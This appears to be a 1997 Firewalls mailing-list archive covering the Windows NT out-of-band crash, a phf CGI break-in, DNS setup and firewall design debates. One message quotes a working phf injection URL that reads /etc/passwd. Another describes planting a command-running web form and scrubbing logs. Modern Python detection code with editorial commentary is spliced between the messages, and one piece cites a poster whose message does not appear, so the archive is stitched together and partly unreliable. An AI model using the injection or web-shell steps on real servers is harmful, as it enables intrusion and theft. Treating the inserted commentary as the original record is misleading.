Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts
Date: Thu, 5 Jun 1997 09:44:16 -0700
X-Mailer: Microsoft Exchange Server Internet
Mail Connector Version 4.0.994.63 MIME-Version: 1.0 Content-Type: text/plain; charset="iso-8859-1" Content-Transfer-Encoding: quoted-printable Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Here's an excerpt from the readme file for the OOB data attack on NT: "A sender specifies "Out of Band" data by setting the URGENT bit flag in the TCP header. The receiver uses the URGENT POINTER to determine where in the segment the urgent data ends. Windows NT bugchecks when the URGENT POINTER points to the end of the frame and no normal data follows. Windows NT expects normal data to follow." Microsoft Tech Support Installing the post SP3 OOB hotfix should correct this problem. Eric L. Tebelak NT Systems Engineer USWeb Corporation E-Mail: elt@usweb.com Web: http://www.usweb.com >-----Original Message----- >From: Daniel Strawson [SMTP:daniel@elmail.co.uk] >Sent: Thursday, June 05, 1997 6:25 AM >To: Jyri Kaljundi >Cc: Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing = list >Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts > > >Hang on a moment. > >Let me put this in perspective. > >As I understand it, this problem results from sending packets with a >particular IP option set in the header. (Please confirm I'm right here >someone). > >Firewall _SHOULD_ drop all packets with IP options set. This would = mean >that all Firewall-1 systems and systems behind Firewall-1 are = impervious >to this attack. (something for Checkpoint to be proud of). > >Unfortunately this is not the case - as I say I've managed to get NT to >crash with FW-1 installed. > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to >crash, you get the NT system that it is running on to crash, so it is = not >an insecurity, but a claimed feature that doesn't work. > >So, either - > > - The IP Options drop code in FW-1 doesn't work. > > or > > - I do not properly understand this attack and it does not work as I > imagine - in this case, please correct me. 
> >Cheers, > >Daniel > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: >>=20 >> > We tried it and, yes we managed to crash an NT based Firewall-1 = system. >> > This is odd since (if memory serves) the packets should be dropped = on the >> > floor by the stateful inspection module. >>=20 >> You mean you can crash and NT FW-1 by sending OOB data to it?! >> That's scary if it is true and should be addressed by Check Point = ASAP! >>=20 >> What I have always thought of FW-1 is that it operates at quite low = level >> inside the OS kernel, that as long as you filter everything the = network >> bugs in the OS don't really matter, as the packets never reach FW-1.=20 >>=20 >> If sending some bytes of data to FW1 crashes it and the OS, this >> combination (FW1+NT) should not be used as a firewall solution at = all. May >> be someone from CP could explain, how much do the bugs in the OS = matter >> once FW1 is installed. >>=20 >> J=FCri >>=20 >>=20 From owner-firewalls-outgoing Thu Jun 5 16:53:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id OAA01850 for firewalls-outgoing; Thu, 5 Jun 1997 14:27:59 -0700 (PDT) Received: (mcb@localhost) by honor.greatcircle.com (8.8.5/Honor-970427-1) id OAA27801 for firewalls@greatcircle.com; Thu, 5 Jun 1997 14:06:20 -0700 (PDT) Received: from newton.ispgaya.pt (newton.ispgaya.pt [194.79.91.19]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id EAA14205 for ; Thu, 5 Jun 1997 04:57:59 -0700 (PDT) Received: from localhost (pbrandao@localhost) by newton.ispgaya.pt (8.8.4/8.8.4) with SMTP id NAA01998 for ; Thu, 5 Jun 1997 13:04:13 +0100 Date: Thu, 5 Jun 1997 13:04:13 +0100 (WET DST) From: Paulo Brandao To: firewalls@GreatCircle.Com Subject: Help Linux Versus WindowsNT passwords Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Hello, My name is Paulo Brandao, and 
i study in ISPGaya, here i am a system administrator of a Linux Machine. Well, i have a big problem, i have a windowsNT4 server and a Linux server, i have about 50 computers with windows95,and i use samba to give access to the homes in Linux, and this is working just fine, my problem is that i have hundreds of accounts and i must creat for each student an account in Linux and another in windowsNT, so each student as 2 password's. So i lost hours to creat and administrate these accounts. What i want to do is by someway to validate a login in the WindowsNT, or buy another server that uses the SMB protocol. I don't no if it is possibel because i have to change the login and passwd source code, but someone told me that that is possible to do using PAM. If someone now how or another way, i will apreciate. Sorry my english, and thank you for your help. Paulo Brandao *----------------------------------------------* | Paulo Brandao | | | | email : pbrandao@ispgaya.pt | | URL : www.ISPGaya.pt | | Home Page : www.ISPGaya.pt/users/pbrandao | | Profissao : Administrador | | Tecnico de Informatica | | Estudante de Eng. 
Informatica | *----------------------------------------------* From owner-firewalls-outgoing Thu Jun 5 16:54:04 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id KAA14348 for firewalls-outgoing; Thu, 5 Jun 1997 10:07:44 -0700 (PDT) Received: from tlingit.elmail.co.uk (tlingit.elmail.co.uk [193.122.233.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id KAA14274 for ; Thu, 5 Jun 1997 10:07:03 -0700 (PDT) Received: from mojave.elmail.co.uk (mojave.elmail.co.uk [193.112.20.14]) by tlingit.elmail.co.uk with SMTP id SAA13799 (2.1.1h-8.8.5/2.1); Thu, 5 Jun 1997 18:14:29 +0100 (BST) Date: Thu, 5 Jun 1997 18:05:54 +0100 (BST) From: Daniel Strawson To: Eric Tebelak cc: "'Jyri Kaljundi'" , "'Greg Loffel'" , "'fw-1-mailinglist@us.checkpoint.com'" , "'Firewalls mailing list'" Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts In-Reply-To: Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Content-Transfer-Encoding: QUOTED-PRINTABLE Sender: firewalls-owner@GreatCircle.COM Precedence: bulk Yes, I've just read the RFCs. I hadn't read this document, I had read other documents and had been given the impression that it was a IP option. I'll be more careful next time I read about these sorts of attack. Cheers, Daniel On Thu, 5 Jun 1997, Eric Tebelak wrote: > Here's an excerpt from the readme file for the OOB data attack on NT: >=20 > "A sender specifies "Out of Band" data by setting the URGENT bit flag in > the > TCP header. The receiver uses the URGENT POINTER to determine where in > the > segment the urgent data ends. Windows NT bugchecks when the URGENT > POINTER > points to the end of the frame and no normal data follows. Windows NT > expects normal data to follow." Microsoft Tech Support >=20 > Installing the post SP3 OOB hotfix should correct this problem. >=20 > Eric L. 
Tebelak > NT Systems Engineer > USWeb Corporation > E-Mail: elt@usweb.com > Web: http://www.usweb.com >=20 > >-----Original Message----- > >From:=09Daniel Strawson [SMTP:daniel@elmail.co.uk] > >Sent:=09Thursday, June 05, 1997 6:25 AM > >To:=09Jyri Kaljundi > >Cc:=09Greg Loffel; fw-1-mailinglist@us.checkpoint.com; Firewalls mailing= list > >Subject:=09RE: [FW1] Out of Band Data Attack against NT-Hosts > > > > > >Hang on a moment. > > > >Let me put this in perspective. > > > >As I understand it, this problem results from sending packets with a > >particular IP option set in the header. (Please confirm I'm right here > >someone). > > > >Firewall _SHOULD_ drop all packets with IP options set. This would mean > >that all Firewall-1 systems and systems behind Firewall-1 are impervious > >to this attack. (something for Checkpoint to be proud of). > > > >Unfortunately this is not the case - as I say I've managed to get NT to > >crash with FW-1 installed. > > > >Note that it is not as such a FW-1 insecurity - you cannot get FW-1 to > >crash, you get the NT system that it is running on to crash, so it is no= t > >an insecurity, but a claimed feature that doesn't work. > > > >So, either - > > > > - The IP Options drop code in FW-1 doesn't work. > > > > or > > > > - I do not properly understand this attack and it does not work as I > > imagine - in this case, please correct me. > > > >Cheers, > > > >Daniel > > > > > > > >On Thu, 5 Jun 1997, Jyri Kaljundi wrote: > > > >> On Wed, 4 Jun 1997, Daniel Strawson wrote: > >>=20 > >> > We tried it and, yes we managed to crash an NT based Firewall-1 syst= em. > >> > This is odd since (if memory serves) the packets should be dropped o= n the > >> > floor by the stateful inspection module. > >>=20 > >> You mean you can crash and NT FW-1 by sending OOB data to it?! > >> That's scary if it is true and should be addressed by Check Point ASAP= ! 
> >>=20 > >> What I have always thought of FW-1 is that it operates at quite low le= vel > >> inside the OS kernel, that as long as you filter everything the networ= k > >> bugs in the OS don't really matter, as the packets never reach FW-1.= =20 > >>=20 > >> If sending some bytes of data to FW1 crashes it and the OS, this > >> combination (FW1+NT) should not be used as a firewall solution at all.= May > >> be someone from CP could explain, how much do the bugs in the OS matte= r > >> once FW1 is installed. > >>=20 > >> J=FCri > >>=20 > >>=20 >=20 From owner-firewalls-outgoing Thu Jun 5 16:56:41 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA17405 for firewalls-outgoing; Thu, 5 Jun 1997 13:10:23 -0700 (PDT) Received: from cheops.anu.edu.au (cheops.anu.edu.au [150.203.76.24]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA17304 for ; Thu, 5 Jun 1997 13:10:04 -0700 (PDT) Message-Id: <199706052010.NAA17304@honor.greatcircle.com> Received: by cheops.anu.edu.au (1.37.109.16/16.2) id AA140251180; Fri, 6 Jun 1997 06:06:21 +1000 From: Darren Reed Subject: Re: [FW1] Out of Band Data Attack against NT-Hosts To: adam@homeport.org (Adam Shostack) Date: Fri, 6 Jun 1997 06:06:20 +1000 (EST) Cc: bdboyle@att.com, jk@stallion.ee, firewalls@GreatCircle.COM In-Reply-To: <199706051640.MAA06916@homeport.org> from "Adam Shostack" at Jun 5, 97 12:40:33 pm X-Mailer: ELM [version 2.4 PL23] Mime-Version: 1.0 Content-Type: text/plain; charset=US-ASCII Content-Transfer-Encoding: 7bit Sender: firewalls-owner@GreatCircle.COM Precedence: bulk In some mail from Adam Shostack, sie said: > > A friend suggests that the problem may be that the FW1 is > passing code upwards to the NT stack. FW1 sits beneath the stack, and > intercepts packets before they can do damage. However, if you > configure the firewall to allow packets to the NT stack, then NT will > crash. Or any NT stack that it lets packets through to... 
(I'm not sure if you mean packets targetted for the NT FW itself or hosts behind...) > I'll point out that if this is so, then an Application Proxy* > probably would not exhibit the same behavior, since it would rebuild > the IP packet, instead of sending the OOB packet on to its > destination when it hits an "OK" rule. Ummm, the application proxy can not protect itself, but if the FW is patched, then it does (should) protect all services behind it. Darren From owner-firewalls-outgoing Thu Jun 5 17:01:08 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA18852 for firewalls-outgoing; Thu, 5 Jun 1997 13:19:26 -0700 (PDT) Received: from miles.greatcircle.com (miles.greatcircle.com [198.102.244.34]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA18586 for ; Thu, 5 Jun 1997 13:18:21 -0700 (PDT) Received: from mycroft.GreatCircle.COM (mycroft.greatcircle.com [198.102.244.35]) by miles.greatcircle.com (8.8.5/Miles-970308-2) with ESMTP id NAA16445 for ; Thu, 5 Jun 1997 13:07:17 -0700 (PDT) Received: from scribe.cc.purdue.edu by mycroft.GreatCircle.COM (8.8.5/SMI-4.1/Brent-970426) id NAA18001; Thu, 5 Jun 1997 13:01:30 -0700 (PDT) Received: from ia01.freh.purdue.edu by scribe.cc.purdue.edu; Thu, 5 Jun 97 15:04:09 -0500 Comments: Authenticated sender is From: "Michael S Hines" Organization: Purdue University To: "Sameer R. Manek" Date: Thu, 5 Jun 1997 15:06:10 -0500 MIME-Version: 1.0 Content-type: text/plain; charset=US-ASCII Content-transfer-encoding: 7BIT Subject: Re: psswd HACK Reply-to: mshines@purdue.edu CC: firewalls@GreatCircle.COM X-mailer: Pegasus Mail for Win32 (v2.42) Message-Id: <33971bb92e3f002@scribe.cc.purdue.edu> Sender: firewalls-owner@GreatCircle.COM Precedence: bulk > This is how the exploit is done > http://"name of server"/cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd > But that's not really important. Lets assume they got your passwd file. 
> That means they have the option to crack on that passwd file, lets assume > they did that too. > > They know in theory know the login and password of every one on that > machine. I'll bet the login names and password of people on your webserver > are the same as their login/password as other machines on your network. > Does this cause concern? it should. Given the fact that they ran the phf > script in april, they've had atleast a month to run crack. > > Assume that your webserver has been compromised and they have had a > sniffer running on that box for a month, what would you do? You need to > think about the worstcase senerio and work backwards instead of thinking > 'oh all they got was my password file' And your web pages are only protected using the UNIX system security - correct? Have you noticed any new web pages yet? Knowing the ID/PW will get them in wiht FTP to upload new web pages...I'd be worried about a web attack. ----------------------------------------------------------------- Internet: mshines@purdue.edu * Michael S. Hines, CDP, CFE Voice: (765) 494-5845 * Sr. Information Systems Auditor FAX: (765) 496-1814 * Purdue University if AC 765 doesn't work, try 317 * 1065 Freehafer Hall * West Lafayette, IN 47907-1065 All views are my own and do not reflect Purdue University policy. 
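The psswd HACK thread above turns on two questions: was phf abused, and for how long has the attacker had the passwd file. An added example (not code from the list or from any of its posters) that scans web-server access logs for the phf request shape quoted above; the log lines are constructed samples in Common Log Format and the hostnames are placeholders.

```python
"""Scan access logs for the phf CGI abuse discussed in the psswd HACK thread:
requests to /cgi-bin/phf whose query carries an encoded newline (%0a), which
is what let phf hand a command to the shell. Added example with constructed
log lines; not code from the mailing list."""
import re
from datetime import datetime
from urllib.parse import unquote

# Constructed sample log lines (Common Log Format); not real traffic.
SAMPLE_LOG = """\
10.0.0.5 - - [14/Apr/1997:03:12:44 -0500] "GET /cgi-bin/phf?Qalias=x%0a/bin/cat%20/etc/passwd HTTP/1.0" 200 1830
10.0.0.9 - - [14/Apr/1997:09:01:10 -0500] "GET /cgi-bin/phf?Qname=smith HTTP/1.0" 200 412
10.0.0.5 - - [15/Apr/1997:01:47:03 -0500] "GET /cgi-bin/phf?Qalias=x%0Aid HTTP/1.0" 200 77
192.0.2.7 - - [02/Jun/1997:10:31:00 -0400] "GET /index.html HTTP/1.0" 200 2048
"""

# host ident user [timestamp] "METHOD path PROTO" status ...
CLF_RE = re.compile(
    r'^(?P<host>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>\S+) (?P<path>\S+)[^"]*" (?P<status>\d{3})'
)
TS_FMT = "%d/%b/%Y:%H:%M:%S %z"


def is_phf_command_injection(path: str) -> bool:
    """True when the request targets phf and the URL-decoded query contains a
    newline; a legitimate phf lookup (e.g. Qname=smith) never carries one."""
    script, sep, query = path.partition("?")
    if not sep or not script.endswith("/cgi-bin/phf"):
        return False
    decoded = unquote(query)  # %0a / %0A / %0d become literal control chars
    return "\n" in decoded or "\r" in decoded


def scan_log(text: str) -> list:
    """Return (host, timestamp, decoded path, status) for every phf injection."""
    hits = []
    for line in text.splitlines():
        m = CLF_RE.match(line)
        if m is None:
            continue  # skip malformed lines rather than abort the scan
        if is_phf_command_injection(m.group("path")):
            ts = datetime.strptime(m.group("ts"), TS_FMT)
            hits.append((m.group("host"), ts,
                         unquote(m.group("path")), int(m.group("status"))))
    return hits


def exposure_days(hits: list, now_str: str) -> int:
    """Days between the earliest *successful* (status 200) phf injection and
    now_str (same CLF timestamp format): the window the attacker has had the
    passwd file to run crack against, which is the thread's real concern."""
    now = datetime.strptime(now_str, TS_FMT)
    successful = [ts for _, ts, _, status in hits if status == 200]
    if not successful:
        return 0
    return (now - min(successful)).days


if __name__ == "__main__":
    hits = scan_log(SAMPLE_LOG)
    for host, ts, path, status in hits:
        print(f"{ts:%Y-%m-%d %H:%M} {host} {status} {path!r}")
    # Date of Michael Hines' reply, used here as "now".
    print("days since first successful phf hit:",
          exposure_days(hits, "05/Jun/1997:15:06:10 -0500"))
```

Run against a real access log the same way; a hit with status 200 means the server answered the request, so the passwd file (and the accounts that share passwords elsewhere, as the thread warns) must be treated as compromised from that timestamp.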
From owner-firewalls-outgoing Thu Jun 5 17:07:26 1997
From: rob@compute.com (Robert Roell -Network Intensive)
Date: Thu, 5 Jun 1997 14:04:41 -0700
To: syscrash@milehigh.net, firewalls@greatcircle.com
Subject: Re: Raptor firewall

Brien,

First let's explain that you need to split your DNS entities into two parts, public and private. Once you have done this, then you need to construct a DNS architecture that will provide all DNS queries (Internet and your pub. and private) to your internal systems, while only providing DNS queries for the public information to the 'Net.

Classically, this is done through a "dual-level" DNS, where you have an internal DNS server providing only answers to private queries, and an external DNS server providing only answers to public queries for your domain. To accomplish this, one sets up the external DNS on the Raptor system, and then the internal DNS server should have a "forwarders" directive in your named.boot file pointing to the Raptor system for anything it does not know about. This is sometimes accomplished through using a "caching-only" DNS server on the Raptor system when you have your ISP providing your public DNS services for your domain.

With EagleNT4.0, Raptor provides a "dnsd" that can accomplish all of this on the Raptor system (i.e. public and private info from one server), while knowing when to allow access queries for private DNS information. In this scenario, I would recommend integrating this with your current DNS through the use of the "forwarders" directive in your named.boot file on your internal server. Then either use the dnsd for your public DNS, or just set up the forwarders to point to your ISP if they are providing your DNS primary for you.

If you look in the EagleNT4.0 docs, there should be a full explanation (with pictures) of the "dual-level" DNS.

HTH,
rob

] [On Jun 5, Brian Delgado wrote:]
] Subject: Raptor firewall
] I am kind of a beginner at this so I apologize if this question is
] basic, but I figured this would be the best forum to get a valid answer.
] Here is my question: I am setting up Raptor on a Windows NT 4.0 server.
] I am currently running DNS on a SUN platform for internal name
] resolution. I realize that Raptor is an application gateway. Does this
] mean I have to run my name server on the Bastion host or can I continue
] to run it where I am currently?
] Any help would be appreciated.
]
] Brien Delgado
]-- End of excerpt from --

-------------------------------------------------------------
N E T W O R K   I N T E N S I V E
A Member of the Verio Group   www.ni.net
Robert Roell   Senior Internet Systems Engineer   rob@compute.com   Phone 714-450-8400
-------------------------------------------------------------

From owner-firewalls-outgoing Thu Jun 5 18:31:45 1997
Date: Thu, 05 Jun 1997 19:20:14 -0700
From: Cihan Subasi
Organization: Garanti Ticaret
To: Firewall Mailing List
Subject: Limiting Mail size..

It is out of topic but how can I limit inbound and outbound email size...

Thanks,
--
Cihan Subasi
Garanti Ticaret, Istanbul Turkey
email= cihans@garanti.com.tr or csubasi@garanti.com.tr
Phone= +902126570404  Fax = +902126570473

From owner-firewalls-outgoing Thu Jun 5 18:37:47 1997
Date: Mon, 02 Jun 1997 12:15:59 -0700
To: fwtk, firewalls
From: "Carl V. Claunch"
Subject: Re: Plug-gw- One to many relationship

At 10:31 AM 6/2/97 -0400, Ken Kempster wrote:
>
>Hi all,
>
> Has anyone gotten a one to many relationship to work
>with FWTK 2.0?
>
> I want to be able to specify x.x.x.x plug-to *
> or
> x.x.x.x plug-to x.x.x.x x.x.x.x etc.
>
>thanx for any help.
>

What semantics are you expecting with this? We have a patch to plug-gw that will try alternate addresses in sequence until a successful connection occurs. It is used mainly for automating access through backup paths. If this is what you want, I could be persuaded to have someone here make this publicly available as a contribution.

From owner-firewalls-outgoing Thu Jun 5 18:44:05 1997
Date: Thu, 5 Jun 1997 14:11:33 -0400 (EDT)
From: Cy Ardoin
To: "Jonathan M. Bresler"
cc: Firewalls@GreatCircle.COM
Subject: Re: PIX and FW-1 (packet filter Question)

On Thu, 5 Jun 1997, Jonathan M. Bresler wrote:

> > I don't think there is anything an application firewall can
> > do that can't also be done by a "packet filter" firewall. The
>
> trivial example:
> a smtp application level proxy can disable the "debug" command
> for every sendmail behind that firewall.

Finding and removing the "debug" command from smtp connections at the packet layer isn't much different than finding and altering the PORT and PASV part of the FTP command and all the NAT style packet filters modify the FTP commands. It's not something packet filters do, but it is no more difficult than many of the things they already do.

Thanks
-- Cy Ardoin   ardoin@cycon.com
--------------------------------------------------------------------
-- Cypress Consulting, Inc.              | Voice: 703/383-0247  ---
-- 4101 Olympic Way, Alexandria VA       | Fax: 703/383-0320    ----
-- and                                   |                      ----
-- 11240 Waples Mill Road, Suite 403,    | http://www.cycon.com/ ---
-- Fairfax, VA 22030                     |                      --
--------------------------------------------------------------------

From owner-firewalls-outgoing Thu Jun 5 19:06:14 1997
Date: Thu, 5 Jun 1997 10:47:25 -0500
From: Craig Brozefsky
Subject: RE: PIX and Firewall-1
To: Bill Stout
cc: firewalls@GreatCircle.COM

On Wed, 4 Jun 1997, Bill Stout wrote:

> Peter Carlson writes....
> >in what way are application level gateways more secure than, say, FW-1 or PIX?
> >There are certainly capabilities that can be provided via application
> >proxies that can't be provided by any filter-based technologies, but what
> >types of attacks are a FW-1 or a PIX vulnerable to that application
> >proxies aren't?

You should check out comp.security.firewalls for a good discussion of these issues. PIX is a NAT capable router with a few filtering rules thrown in, such things are hardly safe, architecturally, and implementation wise. NAT is NOT, I repeat NOT! a security tool, and should not be treated as a part of your security infrastructure. Nearly all NAT tools are not designed with security in mind.

> Application proxies monitor commands sent at the application layer, and
> reconstruct packets so that IP attacks can't be sent beyond the firewall.
> (From what I understand), State-based (a.k.a. enhanced extended packet
> filter) security devices inspect the first packet that comes across with
> enhanced extended filtering rules and can include additional authentication.
> If that packet passes all filtering rules, remaining packets of that session
> are passed through without inspection.

I am not sure that all SMLI firewalls use that method for determining a packet's validity.

> Good applications for packet filter/State-based firewalls are low-security
> internet feeds and fast low-latency intranet (10/100/155MB/...) security
> filtering. Not everyone needs a full application proxy firewall, a subject
> that comes up when I visit Mom-and-Pop small businesses that want a single
> feed for their 10 PCs.

I agree, we actually use Linux boxen in such situations. Our company has a support infrastructure in place to keep those machines in good shape, they are cheap for the client, and we have very intimate knowledge of their workings (most of us in the company are Linux fans). We've been doing this for a few years now I believe. It does routing, email, and NAT for their PC/MAC network and often handles dial-in and printing services as well. All parties involved know that this is not 'the most secure' solution, but it's the most cost effective and flexible.

> IMHO - State-based firewalls are 'only' packet filters, and for the
> corporate environment should not replace the traditional proxy server, but
> work in conjunction with one.

I agree. It would rock if TIS got their IP packet filters really wacked out, with all kinds of filtering options on packet headers. It works well now, but I would like to really have the ability to write up some insane rulesets.

Craig Brozefsky   craig@onshore.com
onShore Inc.      http://www.onshore.com/~craig
Development Team  p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Thu Jun 5 19:14:55 1997
Date: Thu, 5 Jun 1997 12:14:44 -0400 (EDT)
From: "Paul D. Robertson"
To: Stan Wnuck
cc: firewalls@GreatCircle.COM
Subject: Re: psswd HACK

On Thu, 5 Jun 1997, Stan Wnuck wrote:

> OK! Let's say that they did get my passwd file.....
> How much damage can they do if I have a firewall in place that my web server
> sits behind? The only services available from this host to the Internet is

Well, given the fact that they can execute any command on the web server, how much damage can someone with an account on the web server do? Can that machine initiate connections to other hosts other than to SMTP ports or for DNS resolution? If so, makes a great place to launch attacks from. Are there other machines behind that firewall? Suddenly there is a way to attack those machines.....

> http, dns, and smtp. So services like ftp and telnet would be denied if they
> tried. Is there something I am missing?

Don't need telnet, just install a web form that takes commands in, and echos the output. Use PUT to upload files, and bingo, you don't need telnet, FTP, or anything else. Or keep using the current CGI hole to execute commands. The only thing missing is adding a crontab entry to scrub the log files, and that's fairly trivial.

Are all the id/passwords on that machine unique to that machine?

Paul
-----------------------------------------------------------------------------
Paul D. Robertson      "My statements in this message are personal opinions
proberts@clark.net      which may have no basis whatsoever in fact."
PSB#9280

From owner-firewalls-outgoing Thu Jun 5 19:38:48 1997
To: girsch@marben.com (Arnaud Girsch)
Cc: pnash@hanshan.bbnplanet.com, don@genroco.com, jpm@marben.be, ark@paranoid.convey.ru, tobotras@jet.msk.su, fwtk-users@tis.com, firewalls@GreatCircle.COM, ylo@cs.hut.fi
Subject: Re: ssh proxy for fwtk
From: Benedikt Stockebrand
Date: 03 Jun 1997 18:09:35 +0200

girsch@marben.com (Arnaud Girsch) writes:

> For example, you probably restrict X because you think that X is never secure
> and can be abused, etc ... Giving access to X within a ssh tunnel protects
> against most of the X problems, so why not giving X access then ?

I'm not sure, but what about this one: If the remote machine has been hacked, then X forwarding can be more of a problem than help. If the remote sshd (or /bin/*sh or whatever) has been modified to use that X forwarding they're just about right in your local machine. And you can't even tell because you'd need your local user's private key to decrypt things to analyze them.

Anyone know more about this?

Ben

--
Ben(edikt)? Stockebrand   Runaway ping.de Admin---Never Ever Trust Old Friends
My name and email address are not to be added to any list used for advertising purposes. Any sender of unsolicited advertisement e-mail to this address implicitly agrees to pay a DM 500 fee to the recipient for proofreading services.
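The Out of Band thread continues in the next two messages. The Microsoft readme quoted earlier by Eric Tebelak gives a precise, checkable condition (URG flag set, urgent pointer at the end of the segment, no normal data after it), so an added example (not code from the list, from Check Point or from Microsoft) that parses a TCP header and flags segments matching it; the segments are constructed in memory as test input, the helper names are my own, and checksums are left at zero since only the header fields matter here.

```python
"""Flag TCP segments matching the NT 'Out of Band' bugcheck condition from the
Microsoft readme quoted in the thread: URG set and the urgent pointer at the
end of the segment with no normal data following. Added example with
constructed segments; not code from the mailing list."""
import struct

# TCP flag bits in the low byte of the data-offset/flags word (RFC 793 layout).
TCP_URG = 0x20
TCP_ACK = 0x10
TCP_PSH = 0x08

# Byte layout of the fixed 20-byte TCP header (network byte order).
TCP_HDR = "!HHIIHHHH"


def parse_tcp(segment: bytes) -> dict:
    """Minimal TCP parse of a segment (no IP header in front of it)."""
    if len(segment) < 20:
        raise ValueError("short TCP header")
    sport, dport, seq, ack, off_flags, win, csum, urg_ptr = struct.unpack(
        TCP_HDR, segment[:20])
    data_offset = (off_flags >> 12) * 4  # header length in bytes, incl. options
    if data_offset < 20 or data_offset > len(segment):
        raise ValueError("bad data offset")
    return {
        "sport": sport, "dport": dport,
        "flags": off_flags & 0x1FF,
        "urg_ptr": urg_ptr,
        "payload": segment[data_offset:],
    }


def is_oob_bugcheck_candidate(segment: bytes) -> bool:
    """True when URG is set and the urgent pointer reaches the end of the data,
    i.e. every payload byte is 'urgent' and no normal data follows it (the
    readme's condition). Assumption of this example: segments carrying no data
    at all are not flagged, since there is nothing in them to deliver."""
    t = parse_tcp(segment)
    if not (t["flags"] & TCP_URG):
        return False  # without URG the urgent pointer field is meaningless
    if not t["payload"]:
        return False
    return t["urg_ptr"] >= len(t["payload"])


def flag_oob_segments(segments: list) -> list:
    """Return (sport, dport) for every candidate, so a filter can be narrowed
    to the ports that matter (Mike Hedlund reports only 139/NetBIOS reacting)."""
    out = []
    for seg in segments:
        if is_oob_bugcheck_candidate(seg):
            t = parse_tcp(seg)
            out.append((t["sport"], t["dport"]))
    return out


def build_segment(sport: int, dport: int, flags: int, urg_ptr: int,
                  payload: bytes) -> bytes:
    """Build a 20-byte-header TCP segment as test input (checksum left at 0)."""
    off_flags = (5 << 12) | flags  # 5 x 32-bit words, no options
    return struct.pack(TCP_HDR, sport, dport, 1, 1, off_flags, 8192, 0,
                       urg_ptr) + payload


# Constructed sample segments (not captured traffic).
SAMPLE_SEGMENTS = [
    # URG with pointer inside the data: normal data follows, so not a candidate.
    build_segment(1025, 139, TCP_URG | TCP_ACK, 2, b"ABCDEF"),
    # URG with pointer at the end of a 3-byte payload: matches the readme.
    build_segment(1026, 139, TCP_URG | TCP_ACK | TCP_PSH, 3, b"OOB"),
    # Same pointer value but URG clear: nothing urgent, so ignored.
    build_segment(1027, 139, TCP_ACK | TCP_PSH, 3, b"OOB"),
    # Plain data to another port.
    build_segment(1028, 80, TCP_ACK | TCP_PSH, 0, b"GET / HTTP/1.0\r\n"),
]

if __name__ == "__main__":
    for sport, dport in flag_oob_segments(SAMPLE_SEGMENTS):
        print(f"OOB bugcheck candidate: {sport} -> {dport}")
```

Mitigation is the post-SP3 hotfix Eric mentions; the check above only shows what a filter in front of an unpatched host would need to look at, and it is the kind of condition a packet filter can drop without understanding the application.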
From owner-firewalls-outgoing Thu Jun 5 21:24:57 1997 Received: (majordom@localhost) by honor.greatcircle.com (8.8.5/Honor-Lists-970308-1) id NAA26114 for firewalls-outgoing; Thu, 5 Jun 1997 13:58:49 -0700 (PDT) Received: from onshore.com (onShore.com [206.69.88.1]) by honor.greatcircle.com (8.8.5/Honor-970427-1) with ESMTP id NAA24193 for ; Thu, 5 Jun 1997 13:48:24 -0700 (PDT) Received: (from craig@localhost) by onshore.com (8.8.5/8.7.3) id PAA07746; Thu, 5 Jun 1997 15:52:34 -0500 Date: Thu, 5 Jun 1997 15:52:32 -0500 From: Craig Brozefsky Subject: RE: [FW1] Out of Band Data Attack against NT-Hosts To: "Bryan D. Boyle" cc: Jyri Kaljundi , firewalls@GreatCircle.COM In-Reply-To: <199706051346.JAA02854@hogpb.ho.att.com> Message-ID: MIME-Version: 1.0 Content-Type: TEXT/PLAIN; charset=US-ASCII Sender: firewalls-owner@GreatCircle.COM Precedence: bulk On Thu, 5 Jun 1997, Bryan D. Boyle wrote: > It is a bogosity with NT and not with FW1. Can't be addressed by Checkpoint, > since the OS is not in their control. They can only operate (or be as > secure as) at the least common denominator level of the underlying OS. As a vendor deploying a security product on that platform, I feel it is their responsibility, otherwise they should properly compensate for the immaturity and bugginess of their host platform, or simply not deploy. Security products in general are such a bugaboo, prone to playing ont he customers paranoia, selling with hype, scare tactics and generall IMO are very slimy when they reach the broad consumer market. Look at ADT and the home security market. > Nothing except MS code operates in the NT kernel. This problem is with > what happens when you send oob data to a stack (MS) that is tightly integrated > with the OS (FW1 runs on top of this stuff, not in it...) and the stack/OS > interface and control mechanism itself is crap. Can you name a stack ths is not tightly integrated with the kernel? > Of course, on UN*X systems, this is not the case. 
> This is a signal example
> of the difference between designing for peer review of your security model
> and designing for what gets good trade publication reviews.

Hardly the case. Unix vendors are just as prone to market influences as MS,
although their code bases are usually much more stable and more mature. People
really wanted a multi-host authentication and information database for the OS,
and we get NIS+, as security-problematic as anything else out there.

> If there is an overall architectural problem with NT as it is, then the OS
> bugs matter A LOT. But, of course, those that say you can trust a black box
> solution since the vendors are trustworthy are quite quiet on this regard...

It's an issue for both the implementor and the consumer.

> I would agree that you should ignore NT as an OS platform in a
> security solution right now. Just my opinion, $.02 US, etc.

Agreed.

Craig Brozefsky                  craig@onshore.com
onShore Inc.                     http://www.onshore.com/~craig
Development Team                 p_priority=PFUN+(p_work/4)+(2*p_cash)

From owner-firewalls-outgoing Thu Jun 5 21:27:16 1997
